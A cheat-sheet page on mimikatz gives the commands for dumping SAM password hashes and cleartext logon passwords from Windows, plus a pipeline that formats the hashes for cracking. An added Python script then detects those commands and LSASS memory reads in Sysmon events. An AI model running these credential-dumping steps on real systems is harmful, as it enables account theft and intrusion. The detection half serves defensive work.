mimikatz
Dump Password Hashes
Mimikatz needs to be run as SYSTEM, and the SeDebugPrivilege access right needs to be enabled. After launching mimikatz, run:
privilege::debug
token::elevate
If you are already SYSTEM, you do not need to run the second command. Now, to dump the password hashes:
lsadump::sam
This prints the hashes in an awkward format. To convert output saved in lsadump.txt to the user:hash format that john and hashcat accept, run:
grep 'User' -A 1 lsadump.txt| grep -v '-' | cut -d ':' -f 2 | sed 's/ //' | sed '$!N;s/\n/:/'
Dump Passwords of Logged on Users
It is possible to get clear text passwords of users that are logged on. After launching mimikatz, run:
privilege::debug
token::elevate
If you are already SYSTEM, you do not need to run the second command. Now, to dump the passwords and hashes:
sekurlsa::logonpasswords
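On the detection side, the commands above leave two usable signals: the module::command strings when they are passed on the mimikatz command line, and a process opening lsass.exe with memory-read access when sekurlsa::logonpasswords runs. The Python below is an added example, not part of the original page; it checks both signals against constructed records that use Sysmon field names (Event ID 1 and 10). The sample events and the allowlisted EDR path are assumptions.

```python
import re

# Module::command strings listed on this page, matched case-insensitively.
MIMIKATZ_COMMANDS = re.compile(
    r"\b(privilege::debug|token::elevate|lsadump::sam|sekurlsa::logonpasswords)\b",
    re.IGNORECASE,
)
PROCESS_VM_READ = 0x0010  # Windows process access right required to read memory
# Assumption: hypothetical EDR agent that is expected to read LSASS memory.
LSASS_READ_ALLOWLIST = {r"c:\program files\exampleedr\agent.exe"}

# Constructed sample records using Sysmon field names (Event ID 1 and 10).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Users\Public\mimikatz.exe",
     "CommandLine": "mimikatz.exe privilege::debug SEKURLSA::LogonPasswords"},
    {"EventID": 10, "SourceImage": r"C:\Users\Public\mimikatz.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\ExampleEDR\agent.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 1, "Image": r"C:\Windows\System32\whoami.exe",
     "CommandLine": "whoami /priv"},
]


def triage(event):
    """Return a list of (rule, details) findings for one event dict."""
    findings = []
    if event.get("EventID") == 1:  # process creation
        hits = {h.lower() for h in MIMIKATZ_COMMANDS.findall(event.get("CommandLine", ""))}
        if hits:
            findings.append(("mimikatz-command-line", sorted(hits)))
    elif event.get("EventID") == 10:  # one process opened a handle to another
        source = event.get("SourceImage", "").lower()
        target = event.get("TargetImage", "").lower()
        access = int(event.get("GrantedAccess", "0x0"), 16)
        # Flag only handles that include memory-read access to LSASS.
        if (target.endswith("\\lsass.exe") and access & PROCESS_VM_READ
                and source not in LSASS_READ_ALLOWLIST):
            findings.append(("lsass-memory-read", [source, hex(access)]))
    return findings


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["EventID"], triage(ev) or "no finding")
```

Commands typed at the interactive mimikatz prompt never reach process-creation logs, so the LSASS access check is the signal that still fires in that case.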